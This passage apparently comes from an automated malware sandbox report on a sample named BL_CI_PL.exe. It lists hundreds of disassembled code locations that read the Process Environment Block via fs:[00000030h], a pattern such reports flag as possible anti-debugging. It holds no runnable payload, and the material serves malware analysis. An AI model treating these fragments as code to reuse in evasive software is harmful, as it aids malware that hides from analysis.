        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C20 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975C38 mov eax, dword ptr fs:[00000030h]10_2_1E975C38
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975C38 mov ecx, dword ptr fs:[00000030h]10_2_1E975C38
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E4C3D mov eax, dword ptr fs:[00000030h]10_2_1E8E4C3D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A8C3D mov eax, dword ptr fs:[00000030h]10_2_1E8A8C3D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984C59 mov eax, dword ptr fs:[00000030h]10_2_1E984C59
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E933C57 mov eax, dword ptr fs:[00000030h]10_2_1E933C57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADC40 mov eax, dword ptr fs:[00000030h]10_2_1E8ADC40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C40 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8EBC6E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8EBC6E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACC68 mov eax, dword ptr fs:[00000030h]10_2_1E8ACC68
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]10_2_1E8ACD8A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]10_2_1E8ACD8A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6D91 mov eax, dword ptr fs:[00000030h]10_2_1E8B6D91
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A6DA6 mov eax, dword ptr fs:[00000030h]10_2_1E8A6DA6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2DBC mov eax, dword ptr fs:[00000030h]10_2_1E8E2DBC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2DBC mov ecx, dword ptr fs:[00000030h]10_2_1E8E2DBC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADDB0 mov eax, dword ptr fs:[00000030h]10_2_1E8ADDB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B7DB6 mov eax, dword ptr fs:[00000030h]10_2_1E8B7DB6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984DA7 mov eax, dword ptr fs:[00000030h]10_2_1E984DA7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E96ADD6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E96ADD6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A8DCD mov eax, dword ptr fs:[00000030h]10_2_1E8A8DCD
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8BBDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFDE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEDFA mov eax, dword ptr fs:[00000030h]10_2_1E8AEDFA
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97CDEB mov eax, dword ptr fs:[00000030h]10_2_1E97CDEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97CDEB mov eax, dword ptr fs:[00000030h]10_2_1E97CDEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0D01 mov eax, dword ptr fs:[00000030h]10_2_1E8D0D01
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCD10 mov eax, dword ptr fs:[00000030h]10_2_1E8DCD10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DCD10 mov ecx, dword ptr fs:[00000030h]10_2_1E8DCD10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BD08 mov eax, dword ptr fs:[00000030h]10_2_1E96BD08
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BD08 mov eax, dword ptr fs:[00000030h]10_2_1E96BD08
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E948D0A mov eax, dword ptr fs:[00000030h]10_2_1E948D0A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFD20 mov eax, dword ptr fs:[00000030h]10_2_1E8AFD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov ecx, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAD20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960D24 mov eax, dword ptr fs:[00000030h]10_2_1E960D24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8CDD4D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A9D46 mov ecx, dword ptr fs:[00000030h]10_2_1E8A9D46
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931D5E mov eax, dword ptr fs:[00000030h]10_2_1E931D5E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92CD40 mov eax, dword ptr fs:[00000030h]10_2_1E92CD40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92CD40 mov eax, dword ptr fs:[00000030h]10_2_1E92CD40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984D4B mov eax, dword ptr fs:[00000030h]10_2_1E984D4B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975D43 mov eax, dword ptr fs:[00000030h]10_2_1E975D43
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975D43 mov eax, dword ptr fs:[00000030h]10_2_1E975D43
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8B1D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8B1D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C5D60 mov eax, dword ptr fs:[00000030h]10_2_1E8C5D60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956D79 mov esi, dword ptr fs:[00000030h]10_2_1E956D79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E985D65 mov eax, dword ptr fs:[00000030h]10_2_1E985D65
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8EBD71
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8EBD71
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ABA80 mov eax, dword ptr fs:[00000030h]10_2_1E8ABA80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E966A80 mov eax, dword ptr fs:[00000030h]10_2_1E966A80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E957ABE mov eax, dword ptr fs:[00000030h]10_2_1E957ABE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8E9ABF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96DAAF mov eax, dword ptr fs:[00000030h]10_2_1E96DAAF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8C0ACE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8C0ACE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DDAC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFAEC mov edi, dword ptr fs:[00000030h]10_2_1E8AFAEC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0AED mov eax, dword ptr fs:[00000030h]10_2_1E8B0AED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8D0AEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E930AFF mov eax, dword ptr fs:[00000030h]10_2_1E930AFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B9AE4 mov eax, dword ptr fs:[00000030h]10_2_1E8B9AE4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984AE8 mov eax, dword ptr fs:[00000030h]10_2_1E984AE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8C3AF6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8EAA0E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8EAA0E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DA31 mov eax, dword ptr fs:[00000030h]10_2_1E93DA31
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96DA30 mov eax, dword ptr fs:[00000030h]10_2_1E96DA30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DDA20 mov edx, dword ptr fs:[00000030h]10_2_1E8DDA20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8B1A24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8B1A24
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8A7A30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934A57 mov eax, dword ptr fs:[00000030h]10_2_1E934A57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934A57 mov eax, dword ptr fs:[00000030h]10_2_1E934A57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8E9A48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8E9A48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8DEA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8DEA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AFA44 mov ecx, dword ptr fs:[00000030h]10_2_1E8AFA44
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DA40 mov eax, dword ptr fs:[00000030h]10_2_1E93DA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E94AA40 mov eax, dword ptr fs:[00000030h]10_2_1E94AA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E94AA40 mov eax, dword ptr fs:[00000030h]10_2_1E94AA40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97BA66 mov eax, dword ptr fs:[00000030h]10_2_1E97BA66
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E931B93 mov eax, dword ptr fs:[00000030h]10_2_1E931B93
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DB90 mov eax, dword ptr fs:[00000030h]10_2_1E93DB90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1B80 mov eax, dword ptr fs:[00000030h]10_2_1E8C1B80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E1B9C mov eax, dword ptr fs:[00000030h]10_2_1E8E1B9C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E978BBE mov eax, dword ptr fs:[00000030h]10_2_1E978BBE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
